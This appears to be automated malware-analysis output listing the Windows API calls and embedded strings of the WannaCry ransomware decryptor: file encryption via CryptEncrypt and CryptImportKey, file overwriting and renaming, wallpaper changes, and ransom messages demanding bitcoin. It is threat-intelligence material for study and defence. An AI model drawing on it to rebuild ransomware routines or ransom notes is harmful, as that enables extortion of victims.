    • setsockopt.WS2_32(00000000), ref: 0040D7DD
    • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
    • closesocket.WS2_32(00000000), ref: 0040D80E
    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
    • wcslen.MSVCRT ref: 00407EF4
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
    • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
    • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
    • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
    APIs
      • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
      • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
      • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
      • Part of subcall function 004049B0: GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
      • Part of subcall function 004049B0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
      • Part of subcall function 004049B0: CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000000,?), ref: 00404A75
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404A85
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
    • _local_unwind2.MSVCRT ref: 004048EB
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
    • strncmp.MSVCRT(00000000,?), ref: 00404951
    • _local_unwind2.MSVCRT ref: 00404964
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
    • CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000000,?), ref: 00404A75
    • _local_unwind2.MSVCRT ref: 00404A85
    • _local_unwind2.MSVCRT ref: 00404AC7
    APIs
    • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
    • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
    • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
    • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
      • Part of subcall function 00406AE0: #540.MFC42(?,767AAD28), ref: 00406B03
      • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
      • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
      • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
      • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
      • Part of subcall function 00406AE0: #800.MFC42(?,?,767AAD28), ref: 00406B62
      • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
      • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
      • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
      • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
      • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
      • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,767AAD28), ref: 00406BC4
      • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
      • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
    APIs
    • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
    • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
    • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B3B
    APIs
    • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
    • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
    • CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
    APIs
      • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
    • CryptImportKey.ADVAPI32(?,00420794,00000494,00000000,00000000,?,?,00402031,?), ref: 00404727
      • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
      • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
      • Part of subcall function 004049B0: GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
      • Part of subcall function 004049B0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
      • Part of subcall function 004049B0: CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000000,?), ref: 00404A75
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404A85
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
      • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
      • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
      • Part of subcall function 00404770: CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
    APIs
    • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
    APIs
    • #940.MFC42(?), ref: 0040527D
    • #4277.MFC42(?,00000001), ref: 004052A0
    • #923.MFC42(?,00000000,?), ref: 004052B8
    • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
    • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
    • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
    • #4129.MFC42(?,?), ref: 004052FC
    • #5710.MFC42 ref: 00405314
    • #922.MFC42(?,00000000,00000000), ref: 00405326
    • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
    • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
    • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
    • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
    • #940.MFC42(?), ref: 00405396
    • #5710.MFC42(?,?), ref: 004053B8
    • #4129.MFC42(?,?,?,?), ref: 004053D7
    • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
    • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
    • #4129.MFC42(?,?), ref: 00405443
    • #4277.MFC42(?,?,?,?), ref: 0040545B
    • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
    • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
    • #6778.MFC42(?,00000001), ref: 004054EA
    • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
    • #6778.MFC42(00000000,?), ref: 00405536
    • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
    • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
    • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
    • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
    • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
    • CloseHandle.KERNEL32(00000000), ref: 00402234
    • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
    • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
    • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004022AB
    • WriteFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 004022C0
    • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 004022E5
    • SetEndOfFile.KERNEL32(00000000), ref: 004022E8
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040230F
      • Part of subcall function 00404AF0: EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
      • Part of subcall function 00404AF0: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
      • Part of subcall function 00404AF0: LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
      • Part of subcall function 00404AF0: LeaveCriticalSection.KERNEL32(00000014), ref: 00404B3B
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
    • ReadFile.KERNEL32(00000000,?,00100000,?,00000000), ref: 004023F3
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00402436
    • _local_unwind2.MSVCRT ref: 00402452
    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040248A
    • SetEndOfFile.KERNEL32(00000000), ref: 00402491
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 004024AD
    • CloseHandle.KERNEL32(00000000), ref: 004024BD
    • MoveFileW.KERNEL32(?,?), ref: 004024DA
    • _local_unwind2.MSVCRT ref: 00402511
    APIs
    • #470.MFC42 ref: 00408708
    • GetClientRect.USER32(?,?), ref: 0040871F
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
    • #6734.MFC42(?,?), ref: 00408746
    • #323.MFC42(?,?), ref: 0040874F
    • CreateCompatibleDC.GDI32(?), ref: 004087D2
    • #1640.MFC42(00000000), ref: 004087DD
      • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
      • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
    • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
    • FillRect.USER32(?,?,?), ref: 0040887D
    • #2754.MFC42(?,?), ref: 00408892
    • #2381.MFC42(?,?,?), ref: 0040889F
    • #3797.MFC42(?,?,?), ref: 004088C0
    • _ftol.MSVCRT ref: 00408951
    • _ftol.MSVCRT ref: 0040896F
    • FillRect.USER32(?,00000000,00000000), ref: 004089B0
    • FillRect.USER32(?,00000000,?), ref: 004089C2
      • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
      • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
    • #755.MFC42(?,?,?), ref: 00408B20
      • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
    • #5785.MFC42(?,00000000,?,?,?,?,?,?,?,00CC0020,?,?,?), ref: 00408ACE
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,00CC0020,?,?,?), ref: 00408ADE
      • Part of subcall function 00409E20: #2414.MFC42(?,\gA,?,00414238,000000FF,00408AFE,?,?,?), ref: 00409E4B
    • #640.MFC42(?,?,?), ref: 00408B09
    APIs
    • #6453.MFC42 ref: 00401780
    • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
    • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
    • CloseHandle.KERNEL32(?), ref: 004017B2
    • sprintf.MSVCRT ref: 00401811
    • fopen.MSVCRT ref: 00401821
    • fread.MSVCRT ref: 00401844
    • fclose.MSVCRT ref: 0040184D
    • DeleteFileA.KERNEL32(?), ref: 0040185B
    • #537.MFC42(You have a new message:), ref: 00401885
    • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
    • #1200.MFC42 ref: 004018AF
    • #800.MFC42 ref: 004018BF
    • #800.MFC42 ref: 004018D3
    • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
    • rand.MSVCRT ref: 00401903
    • #1200.MFC42(Congratulations! Your payment has been checked!Start decrypting now!,00000040,00000000), ref: 00401939
    Strings
    • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
    • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
    • %08X.dky, xrefs: 0040180A
    • You have a new message:, xrefs: 00401877
    • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
    APIs
    • sprintf.MSVCRT ref: 00401323
    • sprintf.MSVCRT ref: 00401339
    • GetFileAttributesA.KERNEL32(?), ref: 00401343
    • DeleteFileA.KERNEL32(?), ref: 0040139A
    • fopen.MSVCRT ref: 004013D5
    • fread.MSVCRT ref: 00401405
    • fclose.MSVCRT ref: 00401408
    • sprintf.MSVCRT ref: 00401440
    • fopen.MSVCRT ref: 00401453
    • fread.MSVCRT ref: 00401481
    • fclose.MSVCRT ref: 00401484
    • sprintf.MSVCRT ref: 004014C1
    • fopen.MSVCRT ref: 004014D4
    • fread.MSVCRT ref: 00401502
    • fclose.MSVCRT ref: 00401507
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
      • Part of subcall function 0040C240: fopen.MSVCRT ref: 0040C46B
      • Part of subcall function 0040C240: fwrite.MSVCRT ref: 0040C489
      • Part of subcall function 0040C240: fclose.MSVCRT ref: 0040C48F
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
      • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
      • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
      • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
      • Part of subcall function 004047C0: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
      • Part of subcall function 004047C0: strncmp.MSVCRT(00000000,?), ref: 00404951
      • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 00404964
      • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
    APIs
    • time.MSVCRT ref: 004076DA
    • sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
      • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
      • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
      • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
    • #540.MFC42 ref: 00407876
    • _ftol.MSVCRT ref: 004078AA
    • #2818.MFC42(?,$%d,00000000), ref: 004078BE
    • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
    • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
    • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
    • #3092.MFC42(00000402,?), ref: 0040791D
    • #6199.MFC42(00000402,?), ref: 00407924
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
    • #800.MFC42 ref: 0040799F
    APIs
    • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
    • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
    • #567.MFC42(00000066,00000000), ref: 0040612F
    • #567.MFC42(00000066,00000000), ref: 00406147
      • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
      • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
      • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
      • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
      • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
      • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
      • Part of subcall function 004085C0: SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 0040864A
      • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
      • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
      • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
      • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
      • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
      • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
      • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
      • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
      • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
      • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
      • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
    • #567.MFC42(00000066,00000000), ref: 004061DF
    • #540.MFC42(00000066,00000000), ref: 004061F7
    • #540.MFC42(00000066,00000000), ref: 00406209
    • #540.MFC42(00000066,00000000), ref: 00406219
    • #540.MFC42(00000066,00000000), ref: 00406229
    • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
    • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
    • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
    • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
    • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
    • LoadIconA.USER32(00000000,00000080), ref: 0040632F
    • #860.MFC42(00421798), ref: 00406358
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
      • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
    • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
      • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
      • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
      • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
      • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
    • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
    • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
      • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
      • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
    • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
    • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
    • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
    • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
    APIs
    • #4710.MFC42 ref: 004032C5
    • CreateSolidBrush.GDI32(?), ref: 004032DC
    • #1641.MFC42(00000000), ref: 004032E9
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
    • #1641.MFC42(00000000), ref: 0040331F
    • #3092.MFC42(00000408,00000000), ref: 0040332B
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
    • #3092.MFC42(00000409), ref: 00403353
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
    • #3092.MFC42(00000002), ref: 00403372
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
    • #3092.MFC42(0000040E), ref: 00403394
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
      • Part of subcall function 00403CB0: FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
      • Part of subcall function 00403CB0: sscanf.MSVCRT ref: 00403D26
      • Part of subcall function 00403CB0: fopen.MSVCRT ref: 00403D45
      • Part of subcall function 00403CB0: fread.MSVCRT ref: 00403D69
      • Part of subcall function 00403CB0: sprintf.MSVCRT ref: 00403D99
      • Part of subcall function 00403CB0: SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
      • Part of subcall function 00403CB0: #823.MFC42(00000088), ref: 00403DE4
      • Part of subcall function 00403CB0: SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
      • Part of subcall function 00403CB0: fclose.MSVCRT ref: 00403E16
      • Part of subcall function 00403CB0: FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
      • Part of subcall function 00403CB0: FindClose.KERNEL32(?), ref: 00403E3B
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
    • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
    • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
    APIs
    • #540.MFC42(?,767AAD28), ref: 00406B03
    • #3874.MFC42 ref: 00406B1B
    • #537.MFC42(msg\), ref: 00406B29
    • #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
    • sprintf.MSVCRT ref: 00406B59
    • #800.MFC42(?,?,767AAD28), ref: 00406B62
    • #800.MFC42 ref: 00406B73
    • GetFileAttributesA.KERNEL32(?), ref: 00406B7D
    • #537.MFC42(msg\), ref: 00406B91
    • #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
    • sprintf.MSVCRT ref: 00406BBB
    • #800.MFC42(?,?,?,?,?,767AAD28), ref: 00406BC4
    • #800.MFC42 ref: 00406BD5
      • Part of subcall function 00406CF0: SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
      • Part of subcall function 00406CF0: #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767AAD28), ref: 00406D39
      • Part of subcall function 00406CF0: SendMessageA.USER32 ref: 00406D69
      • Part of subcall function 00406CF0: #1979.MFC42 ref: 00406D6F
      • Part of subcall function 00406CF0: #665.MFC42 ref: 00406D87
    • #800.MFC42(?), ref: 00406BF5
    APIs
      • Part of subcall function 00404B70: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404B86
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00402C46), ref: 00404BA3
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,00402C46), ref: 00404BB0
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,00402C46), ref: 00404BBD
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,00402C46), ref: 00404BCA
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,00402C46), ref: 00404BD7
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,00402C46), ref: 00404BE4
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
    APIs
    • #537.MFC42(Received response), ref: 00401634
    • #2385.MFC42 ref: 00401653
    • #537.MFC42(Succeed), ref: 0040166F
    • #2385.MFC42(?,?,?,Succeed), ref: 00401684
    • #537.MFC42(Sent request), ref: 0040169F
    • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
    • #2385.MFC42 ref: 004016D3
    • #537.MFC42(Connected), ref: 004016F5
      • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
      • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
      • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
    • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
    • #2385.MFC42 ref: 00401729
    • #2385.MFC42(?,?,?), ref: 0040174C
    APIs
    • #4710.MFC42 ref: 00404DD5
    • CreateSolidBrush.GDI32(?), ref: 00404DE9
    • #1641.MFC42(00000000), ref: 00404DF3
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
